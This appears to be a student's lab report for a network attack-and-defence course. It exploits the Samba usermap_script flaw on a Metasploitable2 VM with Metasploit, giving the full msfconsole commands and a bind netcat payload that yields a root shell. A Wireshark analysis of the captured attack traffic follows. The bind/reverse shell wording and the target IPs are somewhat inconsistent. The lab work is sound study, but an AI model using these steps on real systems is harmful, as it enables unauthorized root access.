20252802 2025-2026-2 《网络攻防实践》第七周作业
20252802 2025-2026-2 《网络攻防实践》第七周作业
一、实践内容:
1.1 实验要求
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
1.2 实验内容
本实验基于 Kali Linux 和 Metasploitable2 靶机环境,通过桥接模式搭建渗透测试平台。首先配置两台虚拟机网络并测试连通性;随后启动 Wireshark 捕获攻击流量,重点分析 SMB 协议漏洞利用过程。通过解析 TCP 数据流 0 和 2,追踪从 SMBv1 协议协商、恶意 Payload 投递到nc反向 Shell 建立的完整攻击链,验证了 445 端口 SMB 服务的安全风险。
二、实践过程
2.1 使用Metasploit进行Linux远程渗透攻击
首先准备Kali虚拟机,Metasploitable2-Linux虚拟机,将这两台虚拟机选择桥接模式,并相互ping检测连通性
Kali IP 192.168.101.210
Metasploitable IP 192.168.101.112
ping通测试
连通性测试,然后在Kali启动msfconsole
输入命令
msfconsole
搜索实验要求的漏洞模块
输入命令
search samba usermap_script
使用该模块
输入命令
use exploit/multi/samba/usermap_script
输入攻击参数,设置payload 双方IP并开始攻击
输入命令
set payload cmd/unix/bind_netcat
set RHOST 192.168.101.112
set LHOST 192.168.101.210
exploit
输入whoami,显示结果root,在查询ip得到靶机网卡信息,表明攻击成功
2.2 攻防对抗实践
在Kali中启动wireshark并开始攻击
下图为完整的攻击数据包
下图为tcp数据流0
下图为tcp数据流2
数据流0分析: 该数据流展示了SMB协议漏洞利用阶段。通过Wireshark捕获可见SMBv1协议协商过程,包含LANMAN、NTLM等认证机制信息。数据包中嵌入了恶意载荷,利用mkfifo创建命名管道,并通过nc -l -p 4444建立反向Shell监听,实现了从SMB漏洞到命令执行的攻击链
数据流2分析: 该数据流为成功利用漏洞后的交互式Shell会话。攻击者执行whoami确认为root权限,通过ip a获取目标主机网络信息(192.168.3.142/24),表明已通过SMB漏洞成功获取目标系统控制权,建立了稳定的反向连接
结论:两个数据流完整呈现了SMB漏洞利用的"探测-攻击-控制"全流程,验证了445端口SMB服务的安全风险。
三 、实验遇到的困难
桥接模式下Metasploitable和kali虚拟机不在同一网段。
解决方式:输入sudo /etc/init.d/networking restart指令重启Metasploitable网卡
四、实验总结
本次实验成功复现了基于 SMB 协议的远程漏洞利用全过程,掌握了使用 Wireshark 进行网络流量抓包与分析的核心技能,能够识别恶意载荷投递与反向 Shell 建立等关键攻击行为。实验中遇到桥接模式下虚拟机网段不一致的问题,通过重启网络服务有效解决。通过本次实践,深化了对渗透测试"探测 - 攻击 - 控制"全流程的理解,强化了网络安全防护意识,为后续开展系统安全加固与防御策略制定奠定了实践基础。
浙公网安备 33010602011771号